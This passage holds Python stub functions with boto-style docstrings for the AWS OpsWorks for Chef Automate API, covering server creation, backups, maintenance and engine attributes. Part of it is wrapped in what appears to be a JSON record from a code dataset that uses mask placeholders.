backup that you want to use to restore a server. :type ServerName: string :param ServerName: [REQUIRED] The name of the server that you want to restore. :type InstanceType: string :param InstanceType: The type of the instance to create. Valid values must be specified in the following format: ^([cm][34]|t2).* For example, c3.large . If you do not specify this parameter, RestoreServer uses the instance type from the specified backup. :type KeyPair: string :param KeyPair: The name of the key pair to set on the new EC2 instance. This can be helpful if any of the administrators who manage the server no longer have the SSH key. :rtype: dict :return: {} :returns: (dict) -- """ pass def start_maintenance(ServerName=None): """ Manually starts server maintenance. This command can be useful if an earlier maintenance attempt failed, and the underlying cause of maintenance failure has been resolved. The server will switch to UNDER_MAINTENANCE state, while maintenace is in progress. Maintenace can only be started for HEALTHY and UNHEALTHY servers. A InvalidStateException is thrown otherwise. A ResourceNotFoundException is thrown when the server does not exist. A ValidationException is raised when parameters of the request are invalid. See also: AWS API Documentation :example: response = client.start_maintenance( ServerName='string' ) :type ServerName: string :param ServerName: [REQUIRED] The name of the server on which to run maintenance. :rtype: dict :return: { 'Server': { 'BackupRetentionCount': 123, 'ServerName': 'string', 'CreatedAt': datetime(2015, 1, 1), 'DisableAutomatedBackup': True|False, 'Endpoint': 'string', 'Engine': 'string', 'EngineModel': 'string', 'EngineAttributes': [ { 'Name': 'string', 'Value': 'string' }, ], 'EngineVersion': 'string', 'InstanceProfileArn': 'string', 'InstanceType': 'string', 'KeyPair': 'string', 'MaintenanceStatus': 'SUCCESS'|'FAILED', 'PreferredMaintenanceWindow': 'string', 'PreferredBackupWindow': 'string', 'SecurityGroupIds': [ 'string', ], 'ServiceRoleArn': 'string', 'Status': 'BACKING_UP'|'CONNECTION_LOST'|'CREATING'|'DELETING'|'MODIFYING'|'FAILED'|'HEALTHY'|'RUNNING'|'SETUP'|'UNDER_MAINTENANCE'|'UNHEALTHY', 'StatusReason': 'string', 'SubnetIds': [ 'string', ], 'ServerArn': 'string' } } :returns: (string) -- """ pass def update_server(DisableAutomatedBackup=None, BackupRetentionCount=None, ServerName=None, PreferredMaintenanceWindow=None, PreferredBackupWindow=None): """ Updates settings for a server. This operation is synchronous. See also: AWS API Documentation :example: response = client.update_server( DisableAutomatedBackup=True|False, BackupRetentionCount=123, ServerName='string', PreferredMaintenanceWindow='string', PreferredBackupWindow='string' ) :type DisableAutomatedBackup: boolean :param DisableAutomatedBackup: Setting DisableAutomatedBackup to true disables automated or scheduled backups. Automated backups are enabled by default. :type BackupRetentionCount: integer :param BackupRetentionCount: Sets the number of automated backups that you want to keep. :type ServerName: string :param ServerName: [REQUIRED] The name of the server to update. :type PreferredMaintenanceWindow: string :param PreferredMaintenanceWindow: DDD:HH:MM (weekly start time) or HH:MM (daily start time). Time windows always use coordinated universal time (UTC). Valid strings for day of week (DDD ) are: Mon, Tue, Wed, Thr, Fri, Sat, Sun. :type PreferredBackupWindow: string :param PreferredBackupWindow: DDD:HH:MM (weekly start time) or HH:MM (daily start time). Time windows always use coordinated universal time (UTC). Valid strings for day of week (DDD ) are: Mon, Tue, Wed, Thr, Fri, Sat, Sun. :rtype: dict :return: { 'Server': { 'BackupRetentionCount': 123, 'ServerName': 'string', 'CreatedAt': datetime(2015, 1, 1), 'DisableAutomatedBackup': True|False, 'Endpoint': 'string', 'Engine': 'string', 'EngineModel': 'string', 'EngineAttributes': [ { 'Name': 'string', 'Value': 'string' }, ], 'EngineVersion': 'string', 'InstanceProfileArn': 'string', 'InstanceType': 'string', 'KeyPair': 'string', 'MaintenanceStatus': 'SUCCESS'|'FAILED', 'PreferredMaintenanceWindow': 'string', 'PreferredBackupWindow': 'string', 'SecurityGroupIds': [ 'string', ], 'ServiceRoleArn': 'string', 'Status': 'BACKING_UP'|'CONNECTION_LOST'|'CREATING'|'DELETING'|'MODIFYING'|'FAILED'|'HEALTHY'|'RUNNING'|'SETUP'|'UNDER_MAINTENANCE'|'UNHEALTHY', 'StatusReason': 'string', 'SubnetIds': [ 'string', ], 'ServerArn': 'string' } } :returns: CHEF_PIVOTAL_KEY : A base64-encoded RSA private key that is generated by AWS OpsWorks for Chef Automate. This private key is required to access the Chef API. CHEF_STARTER_KIT : A base64-encoded ZIP file. The ZIP file contains a Chef starter kit, which includes a README, a configuration file, and the required RSA private key. Save this file, unzip it, and then change to the directory where you've unzipped the file contents. From this directory, you can run Knife commands. """ pass def update_server_engine_attributes(ServerName=None, AttributeName=None, AttributeValue=None): """ Updates engine specific attributes on a specified server. Server will enter the MODIFYING state when this operation is in progress. Only one update can take place at a time. This operation can be use to reset Chef Server main API key (CHEF_PIVOTAL_KEY ). This operation is asynchronous. This operation can only be called for HEALTHY and UNHEALTHY servers. Otherwise a InvalidStateException is raised. A ResourceNotFoundException is thrown when the server does not exist. A ValidationException is raised when parameters of the request are invalid. See also: AWS API Documentation :example: response = client.update_server_engine_attributes( ServerName='string', AttributeName='string', AttributeValue='string' ) :type ServerName: string :param ServerName: [REQUIRED] The name of the server to update. :type AttributeName: string :param AttributeName: [REQUIRED] The name of the engine attribute to update. :type AttributeValue: string :param AttributeValue: The value to set for the attribute. :rtype: dict :return: { 'Server': { 'BackupRetentionCount': 123, 'ServerName': 'string', 'CreatedAt': datetime(2015, 1, 1), 'DisableAutomatedBackup': True|False, 'Endpoint': 'string', 'Engine': 'string', 'EngineModel': 'string', 'EngineAttributes': [ { 'Name': 'string', 'Value': 'string' }, ], 'EngineVersion': 'string', 'InstanceProfileArn': 'string', 'InstanceType': 'string', 'KeyPair': 'string', 'MaintenanceStatus': 'SUCCESS'|'FAILED', 'PreferredMaintenanceWindow': 'string', 'PreferredBackupWindow': 'string', 'SecurityGroupIds': [ 'string', ], 'ServiceRoleArn': 'string', 'Status': 'BACKING_UP'|'CONNECTION_LOST'|'CREATING'|'DELETING'|'MODIFYING'|'FAILED'|'HEALTHY'|'RUNNING'|'SETUP'|'UNDER_MAINTENANCE'|'UNHEALTHY', 'StatusReason': 'string', 'SubnetIds': [ 'string', ], 'ServerArn': 'string' } } :returns: CHEF_PIVOTAL_KEY : A base64-encoded RSA private key that is generated by AWS OpsWorks for Chef Automate. This private key is required to access the Chef API. CHEF_STARTER_KIT : A base64-encoded ZIP file. The ZIP file contains a Chef starter kit, which includes a README, a configuration file, and the required RSA private key. Save this file, unzip it, and then change to the directory where you've unzipped the file contents. From this directory, you can run Knife commands. """ pass
normal
{ "blob_id": "1947bd280234189ed35277c449cd708a204ea7a4", "index": 6651, "step-1": "<mask token>\n\n\ndef create_backup(ServerName=None, Description=None):\n \"\"\"\n Creates an application-level backup of a server. While the server is BACKING_UP , the server can not be modified and no additional backup can be created.\n Backups can be created for RUNNING , HEALTHY and UNHEALTHY servers.\n This operation is asnychronous.\n By default 50 manual backups can be created.\n A LimitExceededException is thrown then the maximum number of manual backup is reached. A InvalidStateException is thrown when the server is not in any of RUNNING, HEALTHY, UNHEALTHY. A ResourceNotFoundException is thrown when the server is not found. A ValidationException is thrown when parameters of the request are not valid.\n See also: AWS API Documentation\n \n \n :example: response = client.create_backup(\n ServerName='string',\n Description='string'\n )\n \n \n :type ServerName: string\n :param ServerName: [REQUIRED]\n The name of the server that you want to back up.\n \n\n :type Description: string\n :param Description: A user-defined description of the backup.\n\n :rtype: dict\n :return: {\n 'Backup': {\n 'BackupArn': 'string',\n 'BackupId': 'string',\n 'BackupType': 'AUTOMATED'|'MANUAL',\n 'CreatedAt': datetime(2015, 1, 1),\n 'Description': 'string',\n 'Engine': 'string',\n 'EngineModel': 'string',\n 'EngineVersion': 'string',\n 'InstanceProfileArn': 'string',\n 'InstanceType': 'string',\n 'KeyPair': 'string',\n 'PreferredBackupWindow': 'string',\n 'PreferredMaintenanceWindow': 'string',\n 'S3DataSize': 123,\n 'S3DataUrl': 'string',\n 'S3LogUrl': 'string',\n 'SecurityGroupIds': [\n 'string',\n ],\n 'ServerName': 'string',\n 'ServiceRoleArn': 'string',\n 'Status': 'IN_PROGRESS'|'OK'|'FAILED'|'DELETING',\n 'StatusDescription': 'string',\n 'SubnetIds': [\n 'string',\n ],\n 'ToolsVersion': 'string',\n 'UserArn': 'string'\n }\n }\n \n \n :returns: \n (string) --\n \n \"\"\"\n pass\n\n\ndef create_server(DisableAutomatedBackup=None, Engine=None, EngineModel=\n None, EngineVersion=None, EngineAttributes=None, BackupRetentionCount=\n None, ServerName=None, InstanceProfileArn=None, InstanceType=None,\n KeyPair=None, PreferredMaintenanceWindow=None, PreferredBackupWindow=\n None, SecurityGroupIds=None, ServiceRoleArn=None, SubnetIds=None,\n BackupId=None):\n \"\"\"\n Creates and immedately starts a new Server. The server can be used once it has reached the HEALTHY state.\n This operation is asnychronous.\n A LimitExceededException is thrown then the maximum number of server backup is reached. A ResourceAlreadyExistsException is raise when a server with the same name already exists in the account. A ResourceNotFoundException is thrown when a backupId is passed, but the backup does not exist. A ValidationException is thrown when parameters of the request are not valid.\n By default 10 servers can be created. A LimitExceededException is raised when the limit is exceeded.\n When no security groups are provided by using SecurityGroupIds , AWS OpsWorks creates a new security group. This security group opens the Chef server to the world on TCP port 443. If a KeyName is present, SSH access is enabled. SSH is also open to the world on TCP port 22.\n By default, the Chef Server is accessible from any IP address. We recommend that you update your security group rules to allow access from known IP addresses and address ranges only. To edit security group rules, open Security Groups in the navigation pane of the EC2 management console.\n See also: AWS API Documentation\n \n \n :example: response = client.create_server(\n DisableAutomatedBackup=True|False,\n Engine='string',\n EngineModel='string',\n EngineVersion='string',\n EngineAttributes=[\n {\n 'Name': 'string',\n 'Value': 'string'\n },\n ],\n BackupRetentionCount=123,\n ServerName='string',\n InstanceProfileArn='string',\n InstanceType='string',\n KeyPair='string',\n PreferredMaintenanceWindow='string',\n PreferredBackupWindow='string',\n SecurityGroupIds=[\n 'string',\n ],\n ServiceRoleArn='string',\n SubnetIds=[\n 'string',\n ],\n BackupId='string'\n )\n \n \n :type DisableAutomatedBackup: boolean\n :param DisableAutomatedBackup: Enable or disable scheduled backups. Valid values are true or false . The default value is true .\n\n :type Engine: string\n :param Engine: The configuration management engine to use. Valid values include Chef .\n\n :type EngineModel: string\n :param EngineModel: The engine model, or option. Valid values include Single .\n\n :type EngineVersion: string\n :param EngineVersion: The major release version of the engine that you want to use. Values depend on the engine that you choose.\n\n :type EngineAttributes: list\n :param EngineAttributes: Engine attributes on a specified server.\n Attributes accepted in a createServer request:\n CHEF_PIVOTAL_KEY : A base64-encoded RSA private key that is not stored by AWS OpsWorks for Chef Automate. This private key is required to access the Chef API.\n (dict) --A name/value pair that is specific to the engine of the server.\n Name (string) --The name of the engine attribute.\n Value (string) --The value of the engine attribute.\n \n \n\n :type BackupRetentionCount: integer\n :param BackupRetentionCount: The number of automated backups that you want to keep. Whenever a new backup is created, AWS OpsWorks for Chef Automate deletes the oldest backups if this number is exceeded. The default value is 1 .\n\n :type ServerName: string\n :param ServerName: [REQUIRED]\n The name of the server. The server name must be unique within your AWS account, within each region. Server names must start with a letter; then letters, numbers, or hyphens (-) are allowed, up to a maximum of 32 characters.\n \n\n :type InstanceProfileArn: string\n :param InstanceProfileArn: [REQUIRED]\n The ARN of the instance profile that your Amazon EC2 instances use. Although the AWS OpsWorks console typically creates the instance profile for you, in this release of AWS OpsWorks for Chef Automate, run the service-role-creation.yaml AWS CloudFormation template, located at https://s3.amazonaws.com/opsworks-stuff/latest/service-role-creation.yaml. This template creates a stack that includes the instance profile you need.\n \n\n :type InstanceType: string\n :param InstanceType: The Amazon EC2 instance type to use. Valid values must be specified in the following format: ^([cm][34]|t2).* For example, c3.large .\n\n :type KeyPair: string\n :param KeyPair: The Amazon EC2 key pair to set for the instance. You may specify this parameter to connect to your instances by using SSH.\n\n :type PreferredMaintenanceWindow: string\n :param PreferredMaintenanceWindow: The start time for a one-hour period each week during which AWS OpsWorks for Chef Automate performs maintenance on the instance. Valid values must be specified in the following format: DDD:HH:MM . The specified time is in coordinated universal time (UTC). The default value is a random one-hour period on Tuesday, Wednesday, or Friday. See TimeWindowDefinition for more information.\n Example: Mon:08:00 , which represents a start time of every Monday at 08:00 UTC. (8:00 a.m.)\n \n\n :type PreferredBackupWindow: string\n :param PreferredBackupWindow: The start time for a one-hour period during which AWS OpsWorks for Chef Automate backs up application-level data on your server if backups are enabled. Valid values must be specified in one of the following formats:\n HH:MM for daily backups\n DDD:HH:MM for weekly backups\n The specified time is in coordinated universal time (UTC). The default value is a random, daily start time.\n Example: 08:00 , which represents a daily start time of 08:00 UTC.Example: Mon:08:00 , which represents a start time of every Monday at 08:00 UTC. (8:00 a.m.)\n \n\n :type SecurityGroupIds: list\n :param SecurityGroupIds: A list of security group IDs to attach to the Amazon EC2 instance. If you add this parameter, the specified security groups must be within the VPC that is specified by SubnetIds .\n If you do not specify this parameter, AWS OpsWorks for Chef Automate creates one new security group that uses TCP ports 22 and 443, open to 0.0.0.0/0 (everyone).\n (string) --\n \n\n :type ServiceRoleArn: string\n :param ServiceRoleArn: [REQUIRED]\n The service role that the AWS OpsWorks for Chef Automate service backend uses to work with your account. Although the AWS OpsWorks console typically creates the service role for you, in this release of AWS OpsWorks for Chef Automate, run the service-role-creation.yaml AWS CloudFormation template, located at https://s3.amazonaws.com/opsworks-stuff/latest/service-role-creation.yaml. This template creates a stack that includes the service role that you need.\n \n\n :type SubnetIds: list\n :param SubnetIds: The IDs of subnets in which to launch the server EC2 instance.\n Amazon EC2-Classic customers: This field is required. All servers must run within a VPC. The VPC must have 'Auto Assign Public IP' enabled.\n EC2-VPC customers: This field is optional. If you do not specify subnet IDs, your EC2 instances are created in a default subnet that is selected by Amazon EC2. If you specify subnet IDs, the VPC must have 'Auto Assign Public IP' enabled.\n For more information about supported Amazon EC2 platforms, see Supported Platforms .\n (string) --\n \n\n :type BackupId: string\n :param BackupId: If you specify this field, AWS OpsWorks for Chef Automate creates the server by using the backup represented by BackupId.\n\n :rtype: dict\n :return: {\n 'Server': {\n 'BackupRetentionCount': 123,\n 'ServerName': 'string',\n 'CreatedAt': datetime(2015, 1, 1),\n 'DisableAutomatedBackup': True|False,\n 'Endpoint': 'string',\n 'Engine': 'string',\n 'EngineModel': 'string',\n 'EngineAttributes': [\n {\n 'Name': 'string',\n 'Value': 'string'\n },\n ],\n 'EngineVersion': 'string',\n 'InstanceProfileArn': 'string',\n 'InstanceType': 'string',\n 'KeyPair': 'string',\n 'MaintenanceStatus': 'SUCCESS'|'FAILED',\n 'PreferredMaintenanceWindow': 'string',\n 'PreferredBackupWindow': 'string',\n 'SecurityGroupIds': [\n 'string',\n ],\n 'ServiceRoleArn': 'string',\n 'Status': 'BACKING_UP'|'CONNECTION_LOST'|'CREATING'|'DELETING'|'MODIFYING'|'FAILED'|'HEALTHY'|'RUNNING'|'SETUP'|'UNDER_MAINTENANCE'|'UNHEALTHY',\n 'StatusReason': 'string',\n 'SubnetIds': [\n 'string',\n ],\n 'ServerArn': 'string'\n }\n }\n \n \n :returns: \n CHEF_PIVOTAL_KEY : A base64-encoded RSA private key that is generated by AWS OpsWorks for Chef Automate. This private key is required to access the Chef API.\n CHEF_STARTER_KIT : A base64-encoded ZIP file. The ZIP file contains a Chef starter kit, which includes a README, a configuration file, and the required RSA private key. Save this file, unzip it, and then change to the directory where you've unzipped the file contents. From this directory, you can run Knife commands.\n \n \"\"\"\n pass\n\n\ndef delete_backup(BackupId=None):\n \"\"\"\n Deletes a backup. You can delete both manual and automated backups.\n This operation is asynchronous.\n A InvalidStateException is thrown then a backup is already deleting. A ResourceNotFoundException is thrown when the backup does not exist. A ValidationException is thrown when parameters of the request are not valid.\n See also: AWS API Documentation\n \n \n :example: response = client.delete_backup(\n BackupId='string'\n )\n \n \n :type BackupId: string\n :param BackupId: [REQUIRED]\n The ID of the backup to delete. Run the DescribeBackups command to get a list of backup IDs. Backup IDs are in the format ServerName-yyyyMMddHHmmssSSS .\n \n\n :rtype: dict\n :return: {}\n \n \n \"\"\"\n pass\n\n\ndef delete_server(ServerName=None):\n \"\"\"\n Deletes the server and the underlying AWS CloudFormation stack (including the server's EC2 instance). The server status updated to DELETING . Once the server is successfully deleted, it will no longer be returned by DescribeServer requests. If the AWS CloudFormation stack cannot be deleted, the server cannot be deleted.\n This operation is asynchronous.\n A InvalidStateException is thrown then a server is already deleting. A ResourceNotFoundException is thrown when the server does not exist. A ValidationException is raised when parameters of the request are invalid.\n See also: AWS API Documentation\n \n \n :example: response = client.delete_server(\n ServerName='string'\n )\n \n \n :type ServerName: string\n :param ServerName: [REQUIRED]\n The ID of the server to delete.\n \n\n :rtype: dict\n :return: {}\n \n \n \"\"\"\n pass\n\n\ndef describe_account_attributes():\n \"\"\"\n Describes your account attributes, and creates requests to increase limits before they are reached or exceeded.\n This operation is synchronous.\n See also: AWS API Documentation\n \n \n :example: response = client.describe_account_attributes()\n \n \n :rtype: dict\n :return: {\n 'Attributes': [\n {\n 'Name': 'string',\n 'Maximum': 123,\n 'Used': 123\n },\n ]\n }\n \n \n \"\"\"\n pass\n\n\ndef describe_backups(BackupId=None, ServerName=None, NextToken=None,\n MaxResults=None):\n \"\"\"\n Describes backups. The results are ordered by time, with newest backups first. If you do not specify a BackupId or ServerName, the command returns all backups.\n This operation is synchronous.\n A ResourceNotFoundException is thrown when the backup does not exist. A ValidationException is raised when parameters of the request are invalid.\n See also: AWS API Documentation\n \n \n :example: response = client.describe_backups(\n BackupId='string',\n ServerName='string',\n NextToken='string',\n MaxResults=123\n )\n \n \n :type BackupId: string\n :param BackupId: Describes a single backup.\n\n :type ServerName: string\n :param ServerName: Returns backups for the server with the specified ServerName.\n\n :type NextToken: string\n :param NextToken: NextToken is a string that is returned in some command responses. It indicates that not all entries have been returned, and that you must run at least one more request to get remaining items. To get remaining results, call DescribeBackups again, and assign the token from the previous results as the value of the nextToken parameter. If there are no more results, the response object's nextToken parameter value is null . Setting a nextToken value that was not returned in your previous results causes an InvalidNextTokenException to occur.\n\n :type MaxResults: integer\n :param MaxResults: To receive a paginated response, use this parameter to specify the maximum number of results to be returned with a single call. If the number of available results exceeds this maximum, the response includes a NextToken value that you can assign to the NextToken request parameter to get the next set of results.\n\n :rtype: dict\n :return: {\n 'Backups': [\n {\n 'BackupArn': 'string',\n 'BackupId': 'string',\n 'BackupType': 'AUTOMATED'|'MANUAL',\n 'CreatedAt': datetime(2015, 1, 1),\n 'Description': 'string',\n 'Engine': 'string',\n 'EngineModel': 'string',\n 'EngineVersion': 'string',\n 'InstanceProfileArn': 'string',\n 'InstanceType': 'string',\n 'KeyPair': 'string',\n 'PreferredBackupWindow': 'string',\n 'PreferredMaintenanceWindow': 'string',\n 'S3DataSize': 123,\n 'S3DataUrl': 'string',\n 'S3LogUrl': 'string',\n 'SecurityGroupIds': [\n 'string',\n ],\n 'ServerName': 'string',\n 'ServiceRoleArn': 'string',\n 'Status': 'IN_PROGRESS'|'OK'|'FAILED'|'DELETING',\n 'StatusDescription': 'string',\n 'SubnetIds': [\n 'string',\n ],\n 'ToolsVersion': 'string',\n 'UserArn': 'string'\n },\n ],\n 'NextToken': 'string'\n }\n \n \n :returns: \n (string) --\n \n \"\"\"\n pass\n\n\n<mask token>\n\n\ndef describe_node_association_status(NodeAssociationStatusToken=None,\n ServerName=None):\n \"\"\"\n See also: AWS API Documentation\n \n \n :example: response = client.describe_node_association_status(\n NodeAssociationStatusToken='string',\n ServerName='string'\n )\n \n \n :type NodeAssociationStatusToken: string\n :param NodeAssociationStatusToken: [REQUIRED]\n\n :type ServerName: string\n :param ServerName: [REQUIRED]\n\n :rtype: dict\n :return: {\n 'NodeAssociationStatus': 'SUCCESS'|'FAILED'|'IN_PROGRESS'\n }\n \n \n :returns: \n (dict) --\n NodeAssociationStatus (string) --\n \n \n \n \"\"\"\n pass\n\n\n<mask token>\n\n\ndef generate_presigned_url(ClientMethod=None, Params=None, ExpiresIn=None,\n HttpMethod=None):\n \"\"\"\n Generate a presigned url given a client, its method, and arguments\n \n :type ClientMethod: string\n :param ClientMethod: The client method to presign for\n\n :type Params: dict\n :param Params: The parameters normally passed to\n ClientMethod.\n\n :type ExpiresIn: int\n :param ExpiresIn: The number of seconds the presigned url is valid\n for. By default it expires in an hour (3600 seconds)\n\n :type HttpMethod: string\n :param HttpMethod: The http method to use on the generated url. By\n default, the http method is whatever is used in the method's model.\n\n \"\"\"\n pass\n\n\ndef get_paginator(operation_name=None):\n \"\"\"\n Create a paginator for an operation.\n \n :type operation_name: string\n :param operation_name: The operation name. This is the same name\n as the method name on the client. For example, if the\n method name is create_foo, and you'd normally invoke the\n operation as client.create_foo(**kwargs), if the\n create_foo operation can be paginated, you can use the\n call client.get_paginator('create_foo').\n\n :rtype: L{botocore.paginate.Paginator}\n \"\"\"\n pass\n\n\ndef get_waiter():\n \"\"\"\n \n \"\"\"\n pass\n\n\ndef restore_server(BackupId=None, ServerName=None, InstanceType=None,\n KeyPair=None):\n \"\"\"\n Restores a backup to a server that is in a RUNNING , FAILED , or HEALTHY state. When you run RestoreServer, the server's EC2 instance is deleted, and a new EC2 instance is configured. RestoreServer maintains the existing server endpoint, so configuration management of all of the server's client devices should continue to work.\n This operation is asynchronous.\n A InvalidStateException is thrown when the server is not in a valid state. A ResourceNotFoundException is thrown when the server does not exist. A ValidationException is raised when parameters of the request are invalid.\n See also: AWS API Documentation\n \n \n :example: response = client.restore_server(\n BackupId='string',\n ServerName='string',\n InstanceType='string',\n KeyPair='string'\n )\n \n \n :type BackupId: string\n :param BackupId: [REQUIRED]\n The ID of the backup that you want to use to restore a server.\n \n\n :type ServerName: string\n :param ServerName: [REQUIRED]\n The name of the server that you want to restore.\n \n\n :type InstanceType: string\n :param InstanceType: The type of the instance to create. Valid values must be specified in the following format: ^([cm][34]|t2).* For example, c3.large . If you do not specify this parameter, RestoreServer uses the instance type from the specified backup.\n\n :type KeyPair: string\n :param KeyPair: The name of the key pair to set on the new EC2 instance. This can be helpful if any of the administrators who manage the server no longer have the SSH key.\n\n :rtype: dict\n :return: {}\n \n \n :returns: \n (dict) --\n \n \"\"\"\n pass\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef associate_node(ServerName=None, NodeName=None, EngineAttributes=None):\n \"\"\"\n See also: AWS API Documentation\n \n \n :example: response = client.associate_node(\n ServerName='string',\n NodeName='string',\n EngineAttributes=[\n {\n 'Name': 'string',\n 'Value': 'string'\n },\n ]\n )\n \n \n :type ServerName: string\n :param ServerName: [REQUIRED]\n\n :type NodeName: string\n :param NodeName: [REQUIRED]\n\n :type EngineAttributes: list\n :param EngineAttributes: \n (dict) --A name/value pair that is specific to the engine of the server.\n Name (string) --The name of the engine attribute.\n Value (string) --The value of the engine attribute.\n \n \n\n :rtype: dict\n :return: {\n 'NodeAssociationStatusToken': 'string'\n }\n \n \n :returns: \n (dict) --\n NodeAssociationStatusToken (string) --\n \n \n \n \"\"\"\n pass\n\n\n<mask token>\n\n\ndef create_backup(ServerName=None, Description=None):\n \"\"\"\n Creates an application-level backup of a server. While the server is BACKING_UP , the server can not be modified and no additional backup can be created.\n Backups can be created for RUNNING , HEALTHY and UNHEALTHY servers.\n This operation is asnychronous.\n By default 50 manual backups can be created.\n A LimitExceededException is thrown then the maximum number of manual backup is reached. A InvalidStateException is thrown when the server is not in any of RUNNING, HEALTHY, UNHEALTHY. A ResourceNotFoundException is thrown when the server is not found. A ValidationException is thrown when parameters of the request are not valid.\n See also: AWS API Documentation\n \n \n :example: response = client.create_backup(\n ServerName='string',\n Description='string'\n )\n \n \n :type ServerName: string\n :param ServerName: [REQUIRED]\n The name of the server that you want to back up.\n \n\n :type Description: string\n :param Description: A user-defined description of the backup.\n\n :rtype: dict\n :return: {\n 'Backup': {\n 'BackupArn': 'string',\n 'BackupId': 'string',\n 'BackupType': 'AUTOMATED'|'MANUAL',\n 'CreatedAt': datetime(2015, 1, 1),\n 'Description': 'string',\n 'Engine': 'string',\n 'EngineModel': 'string',\n 'EngineVersion': 'string',\n 'InstanceProfileArn': 'string',\n 'InstanceType': 'string',\n 'KeyPair': 'string',\n 'PreferredBackupWindow': 'string',\n 'PreferredMaintenanceWindow': 'string',\n 'S3DataSize': 123,\n 'S3DataUrl': 'string',\n 'S3LogUrl': 'string',\n 'SecurityGroupIds': [\n 'string',\n ],\n 'ServerName': 'string',\n 'ServiceRoleArn': 'string',\n 'Status': 'IN_PROGRESS'|'OK'|'FAILED'|'DELETING',\n 'StatusDescription': 'string',\n 'SubnetIds': [\n 'string',\n ],\n 'ToolsVersion': 'string',\n 'UserArn': 'string'\n }\n }\n \n \n :returns: \n (string) --\n \n \"\"\"\n pass\n\n\ndef create_server(DisableAutomatedBackup=None, Engine=None, EngineModel=\n None, EngineVersion=None, EngineAttributes=None, BackupRetentionCount=\n None, ServerName=None, InstanceProfileArn=None, InstanceType=None,\n KeyPair=None, PreferredMaintenanceWindow=None, PreferredBackupWindow=\n None, SecurityGroupIds=None, ServiceRoleArn=None, SubnetIds=None,\n BackupId=None):\n \"\"\"\n Creates and immedately starts a new Server. The server can be used once it has reached the HEALTHY state.\n This operation is asnychronous.\n A LimitExceededException is thrown then the maximum number of server backup is reached. A ResourceAlreadyExistsException is raise when a server with the same name already exists in the account. A ResourceNotFoundException is thrown when a backupId is passed, but the backup does not exist. A ValidationException is thrown when parameters of the request are not valid.\n By default 10 servers can be created. A LimitExceededException is raised when the limit is exceeded.\n When no security groups are provided by using SecurityGroupIds , AWS OpsWorks creates a new security group. This security group opens the Chef server to the world on TCP port 443. If a KeyName is present, SSH access is enabled. SSH is also open to the world on TCP port 22.\n By default, the Chef Server is accessible from any IP address. We recommend that you update your security group rules to allow access from known IP addresses and address ranges only. To edit security group rules, open Security Groups in the navigation pane of the EC2 management console.\n See also: AWS API Documentation\n \n \n :example: response = client.create_server(\n DisableAutomatedBackup=True|False,\n Engine='string',\n EngineModel='string',\n EngineVersion='string',\n EngineAttributes=[\n {\n 'Name': 'string',\n 'Value': 'string'\n },\n ],\n BackupRetentionCount=123,\n ServerName='string',\n InstanceProfileArn='string',\n InstanceType='string',\n KeyPair='string',\n PreferredMaintenanceWindow='string',\n PreferredBackupWindow='string',\n SecurityGroupIds=[\n 'string',\n ],\n ServiceRoleArn='string',\n SubnetIds=[\n 'string',\n ],\n BackupId='string'\n )\n \n \n :type DisableAutomatedBackup: boolean\n :param DisableAutomatedBackup: Enable or disable scheduled backups. Valid values are true or false . The default value is true .\n\n :type Engine: string\n :param Engine: The configuration management engine to use. Valid values include Chef .\n\n :type EngineModel: string\n :param EngineModel: The engine model, or option. Valid values include Single .\n\n :type EngineVersion: string\n :param EngineVersion: The major release version of the engine that you want to use. Values depend on the engine that you choose.\n\n :type EngineAttributes: list\n :param EngineAttributes: Engine attributes on a specified server.\n Attributes accepted in a createServer request:\n CHEF_PIVOTAL_KEY : A base64-encoded RSA private key that is not stored by AWS OpsWorks for Chef Automate. This private key is required to access the Chef API.\n (dict) --A name/value pair that is specific to the engine of the server.\n Name (string) --The name of the engine attribute.\n Value (string) --The value of the engine attribute.\n \n \n\n :type BackupRetentionCount: integer\n :param BackupRetentionCount: The number of automated backups that you want to keep. Whenever a new backup is created, AWS OpsWorks for Chef Automate deletes the oldest backups if this number is exceeded. The default value is 1 .\n\n :type ServerName: string\n :param ServerName: [REQUIRED]\n The name of the server. The server name must be unique within your AWS account, within each region. Server names must start with a letter; then letters, numbers, or hyphens (-) are allowed, up to a maximum of 32 characters.\n \n\n :type InstanceProfileArn: string\n :param InstanceProfileArn: [REQUIRED]\n The ARN of the instance profile that your Amazon EC2 instances use. Although the AWS OpsWorks console typically creates the instance profile for you, in this release of AWS OpsWorks for Chef Automate, run the service-role-creation.yaml AWS CloudFormation template, located at https://s3.amazonaws.com/opsworks-stuff/latest/service-role-creation.yaml. This template creates a stack that includes the instance profile you need.\n \n\n :type InstanceType: string\n :param InstanceType: The Amazon EC2 instance type to use. Valid values must be specified in the following format: ^([cm][34]|t2).* For example, c3.large .\n\n :type KeyPair: string\n :param KeyPair: The Amazon EC2 key pair to set for the instance. You may specify this parameter to connect to your instances by using SSH.\n\n :type PreferredMaintenanceWindow: string\n :param PreferredMaintenanceWindow: The start time for a one-hour period each week during which AWS OpsWorks for Chef Automate performs maintenance on the instance. Valid values must be specified in the following format: DDD:HH:MM . The specified time is in coordinated universal time (UTC). The default value is a random one-hour period on Tuesday, Wednesday, or Friday. See TimeWindowDefinition for more information.\n Example: Mon:08:00 , which represents a start time of every Monday at 08:00 UTC. (8:00 a.m.)\n \n\n :type PreferredBackupWindow: string\n :param PreferredBackupWindow: The start time for a one-hour period during which AWS OpsWorks for Chef Automate backs up application-level data on your server if backups are enabled. Valid values must be specified in one of the following formats:\n HH:MM for daily backups\n DDD:HH:MM for weekly backups\n The specified time is in coordinated universal time (UTC). The default value is a random, daily start time.\n Example: 08:00 , which represents a daily start time of 08:00 UTC.Example: Mon:08:00 , which represents a start time of every Monday at 08:00 UTC. (8:00 a.m.)\n \n\n :type SecurityGroupIds: list\n :param SecurityGroupIds: A list of security group IDs to attach to the Amazon EC2 instance. If you add this parameter, the specified security groups must be within the VPC that is specified by SubnetIds .\n If you do not specify this parameter, AWS OpsWorks for Chef Automate creates one new security group that uses TCP ports 22 and 443, open to 0.0.0.0/0 (everyone).\n (string) --\n \n\n :type ServiceRoleArn: string\n :param ServiceRoleArn: [REQUIRED]\n The service role that the AWS OpsWorks for Chef Automate service backend uses to work with your account. Although the AWS OpsWorks console typically creates the service role for you, in this release of AWS OpsWorks for Chef Automate, run the service-role-creation.yaml AWS CloudFormation template, located at https://s3.amazonaws.com/opsworks-stuff/latest/service-role-creation.yaml. This template creates a stack that includes the service role that you need.\n \n\n :type SubnetIds: list\n :param SubnetIds: The IDs of subnets in which to launch the server EC2 instance.\n Amazon EC2-Classic customers: This field is required. All servers must run within a VPC. The VPC must have 'Auto Assign Public IP' enabled.\n EC2-VPC 